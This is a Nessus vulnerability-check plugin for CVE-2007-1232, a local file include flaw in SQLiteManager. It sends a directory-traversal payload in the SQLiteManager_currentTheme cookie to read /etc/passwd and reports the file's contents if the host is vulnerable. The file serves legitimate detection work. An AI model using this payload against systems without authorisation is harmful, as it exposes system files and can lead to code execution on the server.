#
# (C) Tenable Network Security
#


  desc = "
Synopsis :

The remote web server contains a PHP script that is susceptible to a
local file include attack. 

Description :

The remote host is running SQLiteManager, a web-based application for
managing SQLite databases. 

The version of SQLiteManager installed on the remote host fails to
sanitize user input to the 'SQLiteManager_currentTheme' cookie before
using it to include PHP code in 'include/config.inc.php'.  An
unauthenticated remote attacker may be able to exploit this issue to
view arbitrary files or to execute arbitrary PHP code on the remote
host, subject to the privileges of the web server user id. 

See also :

http://www.securityfocus.com/archive/1/461304/30/0/threaded

Solution :

Unknown at this time. 

Risk factor :

Medium / CVSS Base Score : 5.1
(CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P)";


if (description)
{
  script_id(24726);
  script_version("$Revision: 1.4 $");

  script_cve_id("CVE-2007-1232");
  script_bugtraq_id(22727);
  script_xref(name:"OSVDB", value:"33801");

  script_name(english:"SQLiteManager SQLiteManager_currentTheme Cookie Local File Include Vulnerability");
  script_summary(english:"Tries to read a local file with SQLiteManager");

  script_description(english:desc);

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2007-2008 Tenable Network Security");

  script_dependencies("http_version.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}


include("global_settings.inc");
include("http_func.inc");
include("http_keepalive.inc");


port = get_http_port(default:80);
if (!get_port_state(port)) exit(0);
if (!can_host_php(port:port)) exit(0);


# Loop through directories.
if (thorough_tests) dirs = make_list("/sqlitemanager", "/sqlite", "/db", cgi_dirs());
else dirs = make_list(cgi_dirs());

foreach dir (dirs)
{
  # Try to retrieve a local file.
  file = "../../../../../../../../../../etc/passwd%00";
  req = http_get(item:string(dir, "/index.php"), port:port);
  req = str_replace(
    string:req,
    find:"User-Agent:",
    replace:string(
      "Cookie: PHPSESSID=2f90c15e395209823ff978f8bd329dea;SQLiteManager_currentTheme=", file, ";SQLiteManager_currentLangue=deleted\r\n",
      "User-Agent:"
    )
  );
  res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
  if (res == NULL) exit(0);

  # There's a problem if...
  if (
    # it looks like SQLiteManager and...
    "<title>SQLiteManager" >< res &&
    # there's an entry for root
    egrep(pattern:"root:.*:0:[01]:", string:res)
  )
  {
    contents = res - strstr(res, "<!DOCTYPE");
    report = string(
      desc,
      "\n\n",
      "Plugin output :\n",
      "\n",
      "Here are the contents of the file '/etc/passwd' that Nessus\n",
      "was able to read from the remote host :\n",
      "\n",
      contents
    );

    security_warning(port:port, data:report);
    exit(0);
  }
}
